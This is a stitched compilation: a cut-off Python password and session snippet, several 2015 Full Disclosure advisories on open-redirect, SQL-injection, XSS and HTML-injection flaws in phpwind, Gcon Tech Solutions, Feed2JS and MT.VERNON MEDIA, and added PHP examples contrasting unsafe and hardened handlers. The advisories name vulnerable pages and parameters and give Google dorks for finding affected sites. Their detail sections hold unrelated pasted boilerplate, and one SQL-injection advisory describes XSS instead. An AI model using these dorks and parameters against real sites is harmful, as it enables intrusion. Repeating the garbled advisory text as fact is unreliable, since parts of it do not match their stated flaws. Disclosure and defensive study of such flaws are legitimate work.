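    so rounds can be raised later without a flag day."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute from the record's own salt and rounds; constant-time compare."""
    algo, rounds, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


def new_session(user_id: int, store: Dict[str, int]) -> Tuple[str, str]:
    """Issue a random token unrelated to the password. The server keeps only
    its SHA-256, so a leaked session table yields no usable tokens.
    Returns (token, Set-Cookie header) with HttpOnly, Secure and SameSite set."""
    token = secrets.token_urlsafe(32)
    store[hashlib.sha256(token.encode()).hexdigest()] = user_id
    header = f"Set-Cookie: sid={token}; Path=/; HttpOnly; Secure; SameSite=Lax"
    return token, header


def user_for_session(token: str, store: Dict[str, int]) -> Optional[int]:
    """Resolve a presented token to its user, or None if unknown."""
    return store.get(hashlib.sha256(token.encode()).hexdigest())
```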

[FD] phpwind v8.7 Unvalidated Redirects and Forwards Web Security Vulnerabilities

2015-05-24 Thread Jing Wang
*phpwind v8.7 Unvalidated Redirects and Forwards Web Security
Vulnerabilities*



Exploit Title: phpwind v8.7 goto.php? &url Parameter Open Redirect Security
Vulnerabilities
Product: phpwind
Vendor: phpwind
Vulnerable Versions: v8.7
Tested Version: v8.7
Advisory Publication: May 24, 2015
Latest Update: May 24, 2015
Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect')
[CWE-601]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend)
Impact Subscore: 4.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)





*Caution Details:*


*(1) Vendor & Product Description:*


*Vendor:*
phpwind



*Product & Vulnerable Versions:*
phpwind
v8.7



*Vendor URL & Download:*
Product can be obtained from here,
http://www.phpwind.net/thread/166





*Product Introduction Overview:*
"Today, the country's 200,000 worth of small sites, there are nearly
100,000 community site uses phpwind, has accumulated more than one million
sites use phpwind, there are 1,000 new sites every day use phpwind. These
community sites covering 52 types of trades every day one million people
gathered in phpwind build community, issued 50 million new information,
visit more than one billion pages. National Day PV30 million or more in
1000 about a large community, there are more than 500 sites selected
phpwind station software provided, including by scouring link Amoy
satisfaction, a daily e-commerce and marketing groups, and other on-line
product vigorously increase in revenue for the site. Excellent partners,
such as Xiamen fish, of Long Lane, Erquan network, Kunshan forum, the North
Sea 360, Huizhou West Lake, Huashang like.

phpwind recent focus on strengthening community media value, expand
e-commerce applications community. phpwind focus on small sites to explore
the value of integration and applications, we believe that the website that
is community, the community can provide a wealth of applications to meet
people access to information, communication, entertainment, consumer and
other living needs, gain a sense of belonging, become online home . With
the development of the Internet, in the form of the site will be more
abundant, the integration of the Forum, more forms of information portals,
social networking sites, we will integrate these applications to products
which, and to create the most optimized user experience. phpwind mission is
to make the community more valuable, so that more people enjoy the
convenience of the Internet community in order to enhance the quality of
life."





*(2) Vulnerability Details:*
phpwind web application has a computer cyber security bug problem. It can
be exploited by Unvalidated Redirects and Forwards (URL Redirection)
attacks. This could allow a user to create a specially crafted URL that, if
clicked, would redirect a victim from the intended legitimate web site to
an arbitrary web site of the attacker's choosing. Such attacks are useful
as the crafted URL initially appears to be a web page of a trusted site.
This could be leveraged to direct an unsuspecting user to a web page
containing attacks that target client-side software such as a web browser
or document rendering programs.

Several other similar products' 0-day vulnerabilities have been found by
some other bug hunter researchers before. phpwind has patched some of them.
The Full Disclosure mailing list is a public forum for detailed discussion
of vulnerabilities and exploitation techniques, as well as tools, papers,
news, and events of interest to the community. FD differs from other
security lists in its open nature and support for researchers' right to
decide how to disclose their own discovered bugs. The full disclosure
movement has been credited with forcing vendors to better secure their
products and to publicly acknowledge and fix flaws rather than hide them.
Vendor legal intimidation and censorship attempts are not tolerated here!
It also publishes suggestions, advisories and solution details related to
Open Redirect vulnerabilities and cyber intelligence recommendations.


*(2.1)* The first programming code flaw occurs at the "&url" parameter in
the "/goto.php?" page.





*References:*
http://www.tetraph.com/security/open-redirect/phpwind-v8-7-open-redirect/
http://securityrelated.blogspot.com/2015/05/phpwind-v87-xss.html
http://www.inzeed.com/kaleidoscope/computer-security/phpwind-v8-7-open-redirect/
https://webtechwire.wordpress.com/2015/05/24/phpwind-v8-7-open-redirect-2/
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01741.html
http://whitehatpost.blog.163.com/blog/static/242232054201542495731506/
http://cxsecurity.com/issue/WLB-2015030028
http://permalink.gmane.org/gmane.comp.security.oss.general/16883
http://lists.openwall.net/full-disclosu
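Added example, not phpwind's code: the check a goto.php?url= style handler needs before emitting a Location header, shown beside the unsafe pattern the advisory above describes. The allow-listed host, the function names and the sample URLs are assumptions constructed for illustration.

```php
<?php
// Added example, not phpwind's code: a redirect-target check for a
// goto.php?url= style handler, beside the unsafe pattern. The allow-listed
// host, the function names and the sample URLs are constructed assumptions.

declare(strict_types=1);

/**
 * Unsafe pattern: whatever arrives in ?url= becomes the Location header,
 * so a link that starts with the trusted site's hostname can end anywhere.
 */
function redirect_unvalidated(string $url): string
{
    return 'Location: ' . $url;
}

/**
 * True only for a site-relative path or an absolute http(s) URL whose host
 * is on the allow-list. Scheme-relative "//host", backslash variants,
 * non-http schemes, userinfo tricks and control characters are rejected.
 */
function is_safe_redirect(string $url, array $allowedHosts): bool
{
    // CR/LF or other control characters would allow header injection.
    if (preg_match('/[\x00-\x1f\x7f]/', $url) === 1) {
        return false;
    }
    // Some browsers treat "\" like "/", turning "/\host" into "//host".
    if (strpos($url, '\\') !== false) {
        return false;
    }
    // Site-relative path: exactly one leading slash.
    if ($url !== '' && $url[0] === '/') {
        return !isset($url[1]) || $url[1] !== '/';
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // "https://forum.example@other.example/" puts the trusted name in the
    // userinfo part; the real host is the one after the "@".
    if (isset($parts['user']) || isset($parts['pass'])) {
        return false;
    }
    return in_array(strtolower($parts['host']), $allowedHosts, true);
}

/** Hardened handler: targets that fail the check fall back to the site root. */
function redirect_validated(string $url, array $allowedHosts): string
{
    $target = is_safe_redirect($url, $allowedHosts) ? $url : '/';
    return 'Location: ' . $target;
}

// Constructed sample inputs checked against a constructed allow-list.
$allowed = ['forum.example'];
$samples = [
    '/thread/166',                      // site-relative path: kept
    'https://forum.example/thread/166', // allow-listed host: kept
    'https://other.example/page',       // foreign host: replaced by "/"
    '//other.example/page',             // scheme-relative: replaced by "/"
    '/\\other.example',                 // backslash variant: replaced by "/"
    'ftp://forum.example/file',         // non-http scheme: replaced by "/"
    "https://forum.example/\r\nX: y",   // control characters: replaced by "/"
];
foreach ($samples as $s) {
    printf("%-40s -> %s\n", json_encode($s), redirect_validated($s, $allowed));
}
```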

[FD] Gcon Tech Solutions v1.0 SQL Injection Web Security Vulnerabilities

2015-05-24 Thread Jing Wang
*Gcon Tech Solutions v1.0 SQL Injection Web Security Vulnerabilities*


Exploit Title: Gcon Tech Solutions v1.0 content.php? &id Parameter SQL
Injection Security Vulnerabilities
Product: Gcon Tech Solutions
Vendor: Gcon Tech Solutions
Vulnerable Versions: v1.0
Tested Version: v1.0
Advisory Publication: May 24, 2015
Latest Update: May 24, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Writer and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)




*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
Gcon Tech Solutions



*Product & Vulnerable Versions:*
Gcon Tech Solutions
v1.0



*Vendor URL & Download:*
Gcon Tech Solutions can be obtained from here,
http://www.gconts.com/Development.htm



*Google Dork:*
"Developed and maintained by Gcon Tech Solutions"



*Product Introduction Overview:*
"Over the years we have developed business domain knowledge various
business areas. We provide Development Services either on time and material
or turn-key fixed prices basis, depending on the nature of the project.
Application Development Services offered by Gcon Tech Solutions help
streamline business processes, systems and information. Gcon Tech Solutions
has a well-defined and mature application development process, which
comprises the complete System Development Life Cycle (SDLC) from defining
the technology strategy formulation to deploying, production operations and
support. We fulfill our client's requirement firstly from our existing
database of highly skilled professionals or by recruiting the finest
candidates locally. We analyze your business requirements and taking into
account any constraints and preferred development tools, prepare a fixed
price quote. This offers our customers a guaranteed price who have a single
point contact for easy administration. We adopt Rapid Application
Development technique where possible for a speedy delivery of the
Solutions. Salient Features of Gcon Tech Solutions Application Development
Services: (a) Flexible and Customizable. (b) Industry driven best
practices. (c) Knowledgebase and reusable components repository. (d) Ensure
process integration with customers at project initiation"




*(2) Vulnerability Details:*
Gcon Tech Solutions web application has a computer cyber security bug
problem. It can be exploited by SQL Injection attacks. This may allow an
attacker to inject or manipulate SQL queries in the back-end database,
allowing for the manipulation or disclosure of arbitrary data.

Several other similar products' 0-day vulnerabilities have been found by
some other bug hunter researchers before. Gcon Tech Solutions has patched
some of them. CXSECurity is a huge collection of information on data
communications safety. Its main objective is to inform about errors in
various applications. It also publishes suggestions, advisories and
solution details related to SQL Injection vulnerabilities and cyber
intelligence recommendations.


*(2.1)* The first programming code flaw occurs at the "content.php?" page
with the "&id" parameter.






*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/gcon-tech-solutions-v1-0-sql/
http://securityrelated.blogspot.com/2015/05/gcon-tech-solutions-v10-sql.html
http://www.diebiyi.com/articles/security/gcon-tech-solutions-v1-0-sql/
https://itswift.wordpress.com/2015/05/23/gcon-tech-solutions-v1-0-sql/
http://whitehatpost.blog.163.com/blog/static/242232054201542455422939/
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01766.html
http://cxsecurity.com/issue/WLB-2015040036
http://seclists.org/fulldisclosure/2015/May/32
http://lists.openwall.net/full-disclosure/2015/05/08/8
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1955





--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Gcon Tech Solutions v1.0 XSS (Cross-site Scripting) Web Security Vulnerabilities

2015-05-24 Thread Jing Wang
*Gcon Tech Solutions v1.0 XSS (Cross-site Scripting) Web Security
Vulnerabilities*


Exploit Title: Gcon Tech Solutions v1.0 content.php? &id Parameter XSS
Security Vulnerabilities
Product: Gcon Tech Solutions
Vendor: Gcon Tech Solutions
Vulnerable Versions: v1.0
Tested Version: v1.0
Advisory Publication: May 23, 2015
Latest Update: May 23, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [School of Physical and Mathematical
Sciences, Nanyang Technological University (NTU), Singapore] (@justqdjing)




*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
Gcon Tech Solutions



*Product & Vulnerable Versions:*
Gcon Tech Solutions
v1.0



*Vendor URL & Download:*
Gcon Tech Solutions can be obtained from here,
http://www.gconts.com/Development.htm



*Google Dork:*
"Developed and maintained by Gcon Tech Solutions"



*Product Introduction Overview:*
"Over the years we have developed business domain knowledge various
business areas. We provide Development Services either on time and material
or turn-key fixed prices basis, depending on the nature of the project.
Application Development Services offered by Gcon Tech Solutions help
streamline business processes, systems and information. Gcon Tech Solutions
has a well-defined and mature application development process, which
comprises the complete System Development Life Cycle (SDLC) from defining
the technology strategy formulation to deploying, production operations and
support. We fulfill our client's requirement firstly from our existing
database of highly skilled professionals or by recruiting the finest
candidates locally. We analyze your business requirements and taking into
account any constraints and preferred development tools, prepare a fixed
price quote. This offers our customers a guaranteed price who have a single
point contact for easy administration. We adopt Rapid Application
Development technique where possible for a speedy delivery of the
Solutions. Salient Features of Gcon Tech Solutions Application Development
Services: (a) Flexible and Customizable. (b) Industry driven best
practices. (c) Knowledgebase and reusable components repository. (d) Ensure
process integration with customers at project initiation"




*(2) Vulnerability Details:*
Gcon Tech Solutions web application has a computer cyber security bug
problem. It can be exploited by XSS attacks. This may allow a remote
attacker to create a specially crafted request that would execute arbitrary
script code in a user's browser session within the trust relationship
between their browser and the server.

Several other similar products' 0-day vulnerabilities have been found by
some other bug hunter researchers before. Gcon Tech Solutions has patched
some of them. The Mail Archive automatically detects when it receives mail
from a new list. Thus, you are encouraged, although certainly not required,
to send a test message to the newly archived list. If you are adding
several lists to the archive, send a separate and distinct test message to
each one. It also publishes suggestions, advisories and solution details
related to XSS vulnerabilities and cyber intelligence recommendations.


*(2.1)* The first programming code flaw occurs at the "&id" parameter in
the "content.php?" page.








*References:*
http://www.tetraph.com/security/xss-vulnerability/gcon-tech-solutions-v1-0-xss/
http://securityrelated.blogspot.com/2015/05/gcon-tech-solutions-v10-xss-cross-site.html
http://www.inzeed.com/kaleidoscope/computer-web-security/gcon-tech-solutions-v1-0-xss/
https://webtechwire.wordpress.com/2015/05/23/gcon-tech-solutions-v1-0-xss/
http://whitehatpost.blog.163.com/blog/static/24223205420154245138791/
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg02028.html
http://seclists.org/fulldisclosure/2015/May/34
https://www.bugscan.net/#!/x/21839
http://lists.openwall.net/full-disclosure/2015/04/05/8
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1957





--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing



[FD] Feed2JS v1.7 XSS (Cross-site Scripting) Web Security Vulnerabilities

2015-05-08 Thread Jing Wang
*Feed2JS v1.7 XSS (Cross-site Scripting) Web Security Vulnerabilities*


Exploit Title: Feed2JS v1.7 magpie_debug.php? &url parameter XSS Security
Vulnerabilities
Product: Feed2JS
Vendor: feed2js.org
Vulnerable Versions: v1.7
Tested Version: v1.7
Advisory Publication: May 09, 2015
Latest Update: May 09, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Jing Wang [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)




*Proposition Details:*


*(1) Vendor & Product Description:*


*Vendor:*
feed2js.org


*Product & Vulnerable Versions:*
Feed2JS
v1.7


*Vendor URL & Download:*
Feed2JS can be downloaded from here,
https://feed2js.org/index.php?s=download


*Source code:*
http://www.gnu.org/licenses/gpl.html


*Product Introduction Overview:*
"What is "Feed to JavaScript"? An RSS Feed is a dynamically generated
summary (in XML format) of information or news published on other web
sites- so when the published RSS changes, your web site will be
automatically changed too. It is a rather simple technology that allows
you, the humble web page designer, to have this content displayed in your
own web page, without having to know a lick about XML! Think of it as a box
you define on your web page that is able to update itself, whenever the
source of the information changes, your web page does too, without you
having to do a single thing to it. This Feed2JS web site (new and
improved!) provides you a free service that can do all the hard work for
you-- in 3 easy steps:
Find the RSS source, the web address for the feed.
Use our simple tool to build the JavaScript command that will display it
Optionally style it up to look pretty.

Please keep in mind that feeds are cached on our site for 60 minutes, so if
you add content to your RSS feed, the updates will take at least an hour to
appear in any other web site using Feed2JS to display that feed. To run
these scripts, you need a web server capable of running PHP which is rather
widely available (and free). You will need to FTP files to your server,
perhaps change permissions, and make some basic edits to configure it for
your system. I give you the code, getting it to work is on your shoulders.
I will try to help, but cannot always promise answers."




*(2) Vulnerability Details:*
Feed2JS web application has a computer security bug problem. It can be
exploited by stored XSS attacks. This may allow a remote attacker to create
a specially crafted request that would execute arbitrary script code in a
user's browser session within the trust relationship between their browser
and the server.

Several other Feed2JS products' 0-day vulnerabilities have been found by
some other bug hunter researchers before. Feed2JS has patched some of them.
"Openwall software releases and other related files are also available from
the Openwall file archive and its mirrors. You are encouraged to use the
mirrors, but be sure to verify the signatures on software you download. The
more experienced users and software developers may use our CVSweb server to
browse through the source code for most pieces of Openwall software along
with revision history information for each source file. We publish
articles, make presentations, and offer professional services." Openwall
has published suggestions, advisories and solution details related to XSS
vulnerabilities.


*(2.1)* The first programming code flaw occurs at the "&url" parameter in
the "magpie_debug.php?" page.





*References:*
http://www.tetraph.com/security/xss-vulnerability/feed2js-v1-7-xss/
http://securityrelated.blogspot.com/2015/05/feed2js-v17-xss-cross-site-scripting.html
http://www.inzeed.com/kaleidoscope/computer-web-security/feed2js-v1-7-xss/
https://vulnerabilitypost.wordpress.com/2015/05/08/feed2js-v1-7-xss/
http://whitehatpost.blog.163.com/blog/static/24223205420154810359682/
https://progressive-comp.com/?l=full-disclosure&m=142907534026807&w=2
https://www.bugscan.net/#!/x/21291
http://bluereader.org/article/27452996
http://lists.openwall.net/full-disclosure/2015/04/15/4




--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing



[FD] MT.VERNON MEDIA Web-Design v1.12 HTML Injection Web Security Vulnerabilities

2015-05-08 Thread Jing Wang
*MT.VERNON MEDIA Web-Design v1.12 HTML Injection Web Security
Vulnerabilities*


Exploit Title: MT.VERNON MEDIA Web-Design v1.12 "gallery.php?" &category
parameter HTML Injection Security Vulnerabilities
Product: Web-Design v1.12
Vendor: MT.VERNON MEDIA
Vulnerable Versions: v1.12
Tested Version: v1.12
Advisory Publication: May 08, 2015
Latest Update: May 08, 2015
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [Mathematics, Nanyang Technological
University (NTU), Singapore] (@justqdjing)



*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
MT.VERNON MEDIA


*Product & Vulnerable Versions:*
Web-Design
v1.12


*Vendor URL & Download:*
MT.VERNON MEDIA can be obtained from here,
http://www.mtvernonmedia.com/services/WebDesign.html



*Google Dork:*
"developed by: Mt. Vernon Media"



*Product Introduction Overview:*
"In today's economy every business is more focused on ROI (Return On
Investment) than ever before. We'll help you ensure a solid ROI for your
website, not only making it effective and easy to use for your clients, but
helping you to drive traffic to your site and ensuring effective content
and design to turn traffic into solid leads, sales, or repeat customers. We
offer custom design and development services tailored to your needs and
specifications drawn up jointly with you to ensure that the appropriate
technology is leveraged for optimum results, creating a dynamic and
effective design, based on market effectiveness and user-friendly design
standards. Our developers are experts in web application development using
various programming languages including Perl, SQL, C, C+, and many other
back-end programming languages, as well as database integration. For a view
of some of your past projects, take a look at our list of clients. We
handle custom development of your Internet project from conception through
publication:

Internet & Intranet sites
Design concepts, layouts, and specifications
Intuitive Graphical User Interface (GUI) design
Dynamic navigation design
Creation and manipulation of graphical design elements
GIF Animation
Flash development
HTML hand-coding and debugging
JavaScript for interactivity and error-checking
ASP (Active Server Pages)
Customized Perl CGI scripts (mailing lists, form submission, etc)
Customized application development in varied programming languages
Site publication and promotion
On-going updating and maintenance
Banner ads"




*(2) Vulnerability Details:*
MT.VERNON MEDIA web application has a computer security bug problem. It can
be exploited by stored HTML Injection attacks. Hypertext Markup Language
(HTML) injection, also sometimes referred to as virtual defacement, is an
attack on a user made possible by an injection vulnerability in a web
application. When an application does not properly handle user supplied
data, an attacker can supply valid HTML, typically via a parameter value,
and inject their own content into the page. This attack is typically used
in conjunction with some form of social engineering, as the attack is
exploiting a code-based vulnerability and a user's trust.

Several other MT.VERNON MEDIA products' 0-day vulnerabilities have been
found by some other bug hunter researchers before. MT.VERNON MEDIA has
patched some of them. BugScan is the first community-based scanner and has
experienced five code refactorings. It has redefined the concept of the
scanner and provides sources for the latest info-sec news, tools, and
advisories. It also publishes suggestions, advisories and solution details
related to HTML vulnerabilities.


*(2.1)* The first programming code flaw occurs at the "&category" parameter
in the "gallery.php?" page.





*References:*
http://www.tetraph.com/security/html-injection/mt-vernon-media-web-design-v1-12-html-injection/
http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-html.html
http://www.inzeed.com/kaleidoscope/computer-web-security/mt-vernon-media-web-design-v1-12-html-injection/
https://vulnerabilitypost.wordpress.com/2015/05/08/mt-vernon-media-web-design-v1-12-html-injection/
http://whitehatpost.blog.163.com/blog/static/24223205420154893850881/
https://progressive-comp.com/?l=full-disclosure&m=142907520526783&w=2
https://www.bugscan.net/#!/x/21454
http://seclists.org/fulldisclosure/2015/Apr/37
http://lists.openwall.net/full-disclosure/2015/04/15/3




--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing



[FD] MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection Web Security Vulnerabilities

2015-05-08 Thread Jing Wang
*MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection Web Security
Vulnerabilities*


Exploit Title: MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection
Security Vulnerabilities
Product: Web-Design
Vendor: MT.VERNON MEDIA
Vulnerable Versions: v1.12
Tested Version: v1.12
Advisory Publication: May 08, 2015
Latest Update: May 08, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore] (@justqdjing)



*Proposition Details:*


*(1) Vendor & Product Description:*


*Vendor:*
MT.VERNON MEDIA


*Product & Vulnerable Versions:*
Web-Design
v1.12



*Vendor URL & Download:*
MT.VERNON MEDIA can be obtained from here,
http://www.mtvernonmedia.com/services/WebDesign.html



*Google Dork:*
"developed by: Mt. Vernon Media"



*Product Introduction Overview:*
"In today's economy every business is more focused on ROI (Return On
Investment) than ever before. We'll help you ensure a solid ROI for your
website, not only making it effective and easy to use for your clients, but
helping you to drive traffic to your site and ensuring effective content
and design to turn traffic into solid leads, sales, or repeat customers. We
offer custom design and development services tailored to your needs and
specifications drawn up jointly with you to ensure that the appropriate
technology is leveraged for optimum results, creating a dynamic and
effective design, based on market effectiveness and user-friendly design
standards. Our developers are experts in web application development using
various programming languages including Perl, SQL, C, C+, and many other
back-end programming languages, as well as database integration. For a view
of some of your past projects, take a look at our list of clients. We
handle custom development of your Internet project from conception through
publication:

Internet & Intranet sites
Design concepts, layouts, and specifications
Intuitive Graphical User Interface (GUI) design
Dynamic navigation design
Creation and manipulation of graphical design elements
GIF Animation
Flash development
HTML hand-coding and debugging
JavaScript for interactivity and error-checking
ASP (Active Server Pages)
Customized Perl CGI scripts (mailing lists, form submission, etc)
Customized application development in varied programming languages
Site publication and promotion
On-going updating and maintenance
Banner ads"




*(2) Vulnerability Details:*
MT.VERNON MEDIA web application has a computer security bug problem. It can
be exploited by stored XSS attacks. This may allow a remote attacker to
create a specially crafted request that would execute arbitrary script code
in a user's browser session within the trust relationship between their
browser and the server.

Several other MT.VERNON MEDIA products' 0-day vulnerabilities have been
found by some other bug hunter researchers before. MT.VERNON MEDIA has
patched some of them. "Openwall software releases and other related files
are also available from the Openwall file archive and its mirrors. You are
encouraged to use the mirrors, but be sure to verify the signatures on
software you download. The more experienced users and software developers
may use our CVSweb server to browse through the source code for most pieces
of Openwall software along with revision history information for each
source file. We publish articles, make presentations, and offer
professional services." Openwall has published suggestions, advisories and
solution details related to SQL Injection vulnerabilities.


*(2.1)* The first programming code flaw occurs at the "section.php?" page
with the "&id" parameter.

*(2.2)* The second programming code flaw occurs at the
"illustrated_verse.php?" page with the "&id" parameter.

*(2.3)* The third programming code flaw occurs at the "image.php?" page
with the "&id" parameter.






*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/mt-vernon-media-web-design-v1-12-multiple-sql-injection/
http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-multiple_8.html
https://progressive-comp.com/?a=139222176300014&r=1&w=1
http://whitehatpost.blog.163.com/blog/static/242232054201548925221/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/mt-vernon-media-web-design-v1-12-multiple-sql-injection/
https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-US&OU=0&ItemId=44951
https://www.bugscan.net/#!/x/21160
http://bluereader.org/article/27452998
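Added example, not Gcon Tech Solutions' or MT.VERNON MEDIA's code, serving both the Gcon Tech Solutions content.php?id= advisory and the MT.VERNON MEDIA section.php, illustrated_verse.php and image.php ?id= advisories above: the lookup behind such a page in the unsafe concatenated form and in a parameterised form. The table names, column names, page-to-table map and the in-memory SQLite fixture are assumptions constructed for illustration.

```php
<?php
// Added example, not Gcon Tech Solutions' or MT.VERNON MEDIA's code: the
// lookup behind a "content.php?id=" style page in the unsafe concatenated
// form and in a parameterised form. Table names, column names, the page map
// and the in-memory SQLite fixture are constructed assumptions.

declare(strict_types=1);

/** Unsafe pattern: the raw query-string value becomes part of the SQL text. */
function build_query_unsafe(string $table, string $rawId): string
{
    return "SELECT * FROM $table WHERE id = " . $rawId;
}

// Pages named in the advisories that all take an ?id= parameter. The table
// is chosen from this fixed map by the script, never from the request.
const ID_PAGES = [
    'content.php'           => 'content',
    'section.php'           => 'section',
    'illustrated_verse.php' => 'illustrated_verse',
    'image.php'             => 'image',
];

/**
 * Hardened lookup: the id must be a positive integer of bounded length and
 * is bound as a typed parameter, so it can never alter the SQL text.
 * Returns the row, or null when nothing matches; throws on a malformed id
 * so the caller can answer 400 without touching the database.
 */
function fetch_by_id(PDO $pdo, string $page, string $rawId): ?array
{
    if (!isset(ID_PAGES[$page])) {
        throw new InvalidArgumentException("unknown page $page");
    }
    if (preg_match('/^[1-9][0-9]{0,9}$/', $rawId) !== 1) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    $table = ID_PAGES[$page];
    $stmt = $pdo->prepare("SELECT * FROM $table WHERE id = :id");
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory fixture so the example runs without a database server.
$pdo = new PDO('sqlite::memory:', null, null,
               [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)');
$pdo->exec("INSERT INTO content VALUES (1, 'Welcome', 1), (2, 'Draft', 0)");

foreach (['1', '1 OR 1=1', 'abc', '999'] as $raw) {
    echo "id=", var_export($raw, true), "\n";
    // The concatenated text is only displayed, never executed.
    echo "  unsafe SQL text: ", build_query_unsafe('content', $raw), "\n";
    try {
        $row = fetch_by_id($pdo, 'content.php', $raw);
        echo "  hardened result: ", $row === null ? 'no row' : $row['title'], "\n";
    } catch (InvalidArgumentException $e) {
        echo "  hardened result: rejected (", $e->getMessage(), ")\n";
    }
}
```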




[FD] MT.VERNON MEDIA Web-Design v1.12 Multiple XSS (Cross-site Scripting) Web Security Vulnerabilities

2015-05-08 Thread Jing Wang
*MT.VERNON MEDIA Web-Design v1.12 Multiple XSS (Cross-site Scripting) Web
Security Vulnerabilities*


Exploit Title: MT.VERNON MEDIA Web-Design v1.12 Multiple XSS Security
Vulnerabilities
Product: Web-Design
Vendor: MT.VERNON MEDIA
Vulnerable Versions: v1.12
Tested Version: v1.12
Advisory Publication: May 07, 2015
Latest Update: May 07, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [Mathematics, Nanyang Technological
University (NTU), Singapore] (@justqdjing)




*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
MT.VERNON MEDIA



*Product & Vulnerable Versions:*
Web-Design
v1.12



*Vendor URL & Download:*
MT.VERNON MEDIA can be obtained from here,
http://www.mtvernonmedia.com/services/WebDesign.html



*Google Dork:*
"developed by: Mt. Vernon Media"



*Product Introduction Overview:*
"In today's economy every business is more focused on ROI (Return On
Investment) than ever before. We'll help you ensure a solid ROI for your
website, not only making it effective and easy to use for your clients, but
helping you to drive traffic to your site and ensuring effective content
and design to turn traffic into solid leads, sales, or repeat customers. We
